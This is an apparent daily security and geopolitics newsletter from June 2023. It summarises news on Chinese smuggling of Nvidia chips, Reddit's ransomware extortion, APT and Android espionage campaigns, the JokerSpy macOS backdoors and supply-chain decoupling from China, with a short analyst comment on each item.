Daily Drop (525): CN's underground market: AI Chips, Reddit: Ransomware posting, APT: Target Middle Eastern and African Governments, Foxconn hedges its bets, US: Automakers to cut ties with CN
06-20-23
Tuesday, Jun 20, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
Inside China's underground market for high-end Nvidia AI chips
Analyst Comments: The presence of these Nvidia chips in China's underground market highlights the challenges of enforcing export controls and sanctions in the digital age, particularly for high-demand products such as high-performance AI chips. These chips are crucial for developing advanced AI technologies, which are central to both economic competitiveness and national security considerations. The current scenario underlines the demand for these chips in China, highlighting the country's growing capabilities and ambitions in the AI field. However, this situation also underscores the limitations of unilateral export controls in preventing access to advanced technologies, particularly in an interconnected global supply chain.
FROM THE MEDIA: High-end Nvidia AI chips, whose export to China and Hong Kong was banned by the US administration in September 2023, are now available in the underground markets in Shenzhen, China. The chips, although unadvertised, can be procured discreetly from vendors for around $20,000 apiece, double the usual price. This development comes after the demand for high-end chips has surged globally, especially for Nvidia's microprocessors, which are deemed superior for machine-learning tasks. Nvidia does not permit exports of the A100 or H100 chips to China and has developed slower variants, A800 and H800, to comply with US law.
READ THE STORY: Reuters
UK’s chief hacker to Take over National Crime Agency’s Economic and organized crime directorate
Analyst Comments: James Babbage's move from the NCF to the NCA reflects a shift in focus from cyber operations to economic crime investigation. Babbage's extensive experience in leading the NCF and his background in cyber and signals intelligence at GCHQ makes him well-suited for his new role at the NECC. As the director general, Babbage will play a crucial role in addressing economic crime threats, such as money laundering and commodity fraud. The NECC's work aligns with the UK government's efforts to combat economic crimes and ensure the integrity of the financial system.
FROM THE MEDIA: James Babbage, the head of the UK's National Cyber Force (NCF), is leaving his position to take on a role at the National Crime Agency (NCA) as the director general of the National Economic Crime Centre (NECC) and threat leadership. Babbage's appointment comes after the demotion of Steve Rodhouse, the former director general for operations at the NCA. Babbage had been leading the NCF, consolidating cyber capabilities across UK military and intelligence agencies since its establishment in 2020. The NCF will continue its operations under new leadership. The NECC is responsible for investigating economic crimes, including commodity fraud and money laundering.
READ THE STORY: The Record
China launches new space satellite
Analyst Comments: The successful deployment of the Shiyan-25 satellite underscores China's continued progress in space technology and Earth observation. The use of the Long March-6 rocket, a high-speed response vehicle, demonstrates China's capabilities in delivering payloads to specific orbits effectively and efficiently. The longevity and versatility of the Long March rocket series, with the latest launch marking its 477th mission, speaks to the robustness of China's space program. Moreover, the operational status of the Shiyan-25 opens new avenues for Earth-observation technology experiments, which could lead to advancements in environmental monitoring, weather prediction, and other areas of science and technology.
FROM THE MEDIA: On June 20, 2023, China successfully launched the Shiyan-25 satellite using a Long March-6 rocket from the Taiyuan Satellite Launch Center. The Shiyan-25, now operational and in a Sun-synchronous orbit, is slated for conducting experiments related to new Earth-observation technologies. This marked the 477th flight of China's Long March rocket series. The Long March-6, a product of the Shanghai Academy of Spaceflight Technology and the China Aerospace Science and Technology Corporation, is a small liquid-fueled launch vehicle. It has a height of 29 meters, a diameter of 3.35 meters, and a mass of 103,000 kg. The rocket is designed in three stages, using different engines and propellants for each stage, and can place at least 1,000 kg of payload into a Sun-synchronous orbit
READ THE STORY: United News of India
Reddit says ransomware posting connected to the February incident
Analyst Comments: Reddit's acknowledgment of the connection between the recent ransomware claims and the February security incident reinforces the seriousness of the situation. The sophisticated phishing campaign highlights the need for robust cybersecurity measures and employee awareness training. While Reddit stated that no high-risk data was compromised, the incident raises concerns about the potential exposure of internal documents and contact information. The fact that the ransomware group behind this incident is associated with Darkside, the group responsible for the Colonial Pipeline attack, adds to the significance of the threat.
FROM THE MEDIA: Reddit has acknowledged that recent claims made by the BlackCat/AlphV ransomware group are connected to a security incident the company announced in February. The ransomware group threatened to release 80GB of stolen data unless they were paid $4.5 million and Reddit ended its decision to charge third parties for using its API. Reddit stated that the claims are related to the previously disclosed security incident, which involved a sophisticated phishing campaign that allowed hackers to access some internal documents and business information. Reddit clarified that no high-risk data, such as credit card details or account passwords, was compromised.
READ THE STORY: The Record
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
Analyst Comments: The CL-STA-0043 cyber-espionage campaign represents a significant threat to government entities in the Middle East and Africa. The campaign demonstrates a high level of sophistication, adaptiveness, and a wide range of capabilities, suggesting the involvement of a nation-state threat actor. The use of never-before-seen and rare techniques highlights the advanced nature of the attacks. Organizations should prioritize securing their on-premises IIS and Exchange servers, implementing strong access controls, regularly patching vulnerabilities, and monitoring for suspicious activities.
FROM THE MEDIA: Government entities in the Middle East and Africa have been targeted by advanced persistent threat (APT) cyber-espionage attacks that exploit new and rare credential theft and Exchange email exfiltration techniques. The attacks are primarily aimed at obtaining highly confidential and sensitive information related to politicians, military activities, and ministries of foreign affairs. The Cortex Threat Research team at Palo Alto Networks has temporarily named the activity CL-STA-0043 and described it as a "true APT." The infection begins with the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers. Failed attempts to execute the China Chopper web shell in one of the attacks led the adversaries to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
READ THE STORY: THN
Italy ties China’s hands at Pirelli over fears about chip technology
Analyst Comments: Italy's imposition of restrictions on Sinochem underscores the increasing concerns about protecting sensitive technology from Chinese access. By utilizing the "Golden Power" regulations, Italy aims to safeguard the strategic importance of chip technology and prevent the transfer of sensitive information. This move aligns with similar actions taken by other European countries and the United States. It highlights the growing scrutiny and measures being implemented to limit China's access to advanced technology. As geopolitical tensions continue to rise, multinational companies are also considering steps to protect their operations, such as spinning off businesses or creating separate units in response to growing friction.
FROM THE MEDIA: The Italian government has imposed restrictions on Sinochem, the largest shareholder of Pirelli, to prevent the Chinese government's access to sensitive chip technology. Italy invoked its "Golden Power" regulations, aimed at protecting assets of strategic importance to the country. The move follows similar interventions by Germany and the United Kingdom to safeguard semiconductor technology. The order limits Sinochem's involvement in Pirelli, including barring it from devising the company's strategy and financial plans or appointing a CEO. The restrictions aim to protect Pirelli's autonomy and information of strategic importance.
READ THE STORY: KRDO
Foxconn hedges its bets: US and China will make up, but diversify just in case
Analyst Comments: Foxconn's plans for geographic diversification and its pivot toward the EV market underscore the company's strategic adaptation to global trends and geopolitical tensions. The manufacturing giant's shift away from China in response to US pressure is indicative of the broader shift in global supply chains as companies seek to reduce their dependence on China. Foxconn's investment in the EV industry aligns with global trends toward decarbonization and electrification, suggesting that the company is positioning itself to capitalize on this rapidly growing market.
FROM THE MEDIA: Foxconn's CEO, Young Liu, in an interview with the BBC, stated that he believes the company will continue manufacturing components in China for electronics produced by US firms, despite the tense relationship between the two countries. However, he did express concern over worsening US-China relations. In anticipation of potential geopolitical conflicts, Foxconn has started geographic diversification of its facilities. Some production lines have already been relocated to Mexico and Vietnam. Liu believes that the US and China will eventually reach a balance in their relationship. The interview also touched on the mass exodus of workers from the Zhengzhou iPhone factory in 2022, which Liu described as a "transportation issue". Looking ahead, Foxconn plans to expand into the electric vehicle (EV) market, betting on the increasing use of electronic components in such vehicles.
READ THE STORY: The Register
US Lawmakers to urge automakers to cut reliance on China
Analyst Comments: The meeting between the bipartisan group of US lawmakers and the CEOs of Ford and General Motors reflects growing concern in the US over-dependence on China for critical parts in the auto industry, particularly EV batteries. The push for less reliance on China aligns with broader efforts in the US to strengthen domestic industries, secure supply chains, and reduce economic dependencies on strategic rivals. The outcome of this initiative could have substantial implications for the future of the US auto industry, particularly as it pertains to electric vehicles, and might accelerate efforts to develop domestic capabilities in EV battery production.
FROM THE MEDIA: A bipartisan group of US lawmakers from the House of Representatives China Select Committee plan to meet with the CEOs of Ford and General Motors to urge them to reduce reliance on China for auto parts, especially electric vehicle (EV) batteries. The focus on Chinese auto parts follows a visit by the US Secretary of State to Beijing that didn't yield significant breakthroughs. The lawmakers also plan to meet executives from auto suppliers including BorgWarner, Continental, Bosch, Tenneco, and battery startup Our Next Energy. Earlier this year, the $430 billion Inflation Reduction Act was signed into law aiming to diminish US EV production dependency on Chinese supply chains by imposing new conditions on EV tax credits. Ford's agreement to use technology from Chinese battery company CATL for its $3.5 billion battery plant in Michigan has faced criticism from lawmakers.
READ THE STORY: Reuters
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems
Analyst Comments: The discovery of this sophisticated toolkit targeting macOS systems raises concerns about the security of Apple devices. The toolkit's cross-platform capabilities and the presence of backdoors suggest that threat actors are actively developing advanced malware to target macOS users. This underscores the importance of implementing robust security measures, including regular software updates, strong access controls, and comprehensive threat detection and response capabilities.
FROM THE MEDIA: Cybersecurity researchers from Bitdefender have uncovered a sophisticated toolkit targeting Apple macOS systems. The toolkit consists of four malicious samples, two of which are Python-based backdoors called JokerSpy, capable of targeting Windows, Linux, and macOS. These backdoors establish contact with remote servers to fetch instructions and can execute various actions, such as gathering system information, running commands, downloading files, and exfiltrating data. The researchers also identified a more potent backdoor labeled "sh.py," which possesses extensive capabilities for system metadata gathering, file enumeration, command execution, and data exfiltration. Additionally, they discovered a Swift-based FAT binary called xcc, designed to check permissions and potentially interact with spyware components.
READ THE STORY: THN
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign
Analyst Comments: This cyber campaign underscores the escalating threat posed by rogue apps and highlights the challenges faced by app store platforms in vetting and securing their ecosystems. It also raises concerns about the growing use of such techniques by state-backed actors, suggesting a trend toward the use of cyber operations in geopolitical conflicts. Furthermore, this development stresses the importance of individual users scrutinizing and verifying apps before downloading them, even when they are available in official app stores.
FROM THE MEDIA: Cybersecurity firm Cyfirma has reported a new targeted cyber campaign in Pakistan that uses two rogue Android apps available on Google Play Store to gather information from unsuspecting users. The firm attributes the campaign to a threat actor known as the DoNot Team, also known as APT-C-35 and Viceroy Tiger, which is believed to have ties to India. The malicious activity involves duping Android smartphone users into downloading a program that extracts contact and location data. The rogue apps, originating from a developer named "SecurITY Industry," pose as VPN and chat apps. The cyberattacks are highly targeted, a typical feature of nation-state actors, and make use of the implicit trust users place in the Google Play Store, underlining the importance of careful app vetting prior to download.
READ THE STORY: THN
Keep reading with a 7-day free trial
Subscribe to Bob’s Newsletter to keep reading this post and get 7 days of free access to the full post archives.